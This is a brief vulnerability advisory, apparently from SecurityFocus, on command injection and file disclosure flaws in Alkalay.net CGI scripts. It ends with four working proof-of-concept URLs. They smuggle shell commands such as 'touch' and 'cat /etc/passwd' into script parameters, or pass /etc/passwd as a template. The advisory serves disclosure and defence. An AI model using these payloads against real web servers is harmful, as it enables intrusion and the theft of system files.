source: https://www.securityfocus.com/bid/14893/info
Multiple Alkalay.net scripts are prone to arbitrary remote command execution vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input.
An attacker can prefix arbitrary commands with the pipe '|' character and have them executed in the context of the Web server process.
http://www.example.com/cgi-bin/man-cgi?section=0&topic=ls;touch%20/tmp/test
http://www.example.com/cgi-bin/nslookup.cgi?query=example.com%3B/bin/cat%20/etc/passwd&type=ANY&ns=
http://www.example.com/cgi-bin/contribute.pl?template=/etc/passwd&contribdir=.
http://www.example.com/cgi-bin/contribute.cgi?template=/etc/passwd&contribdir=.
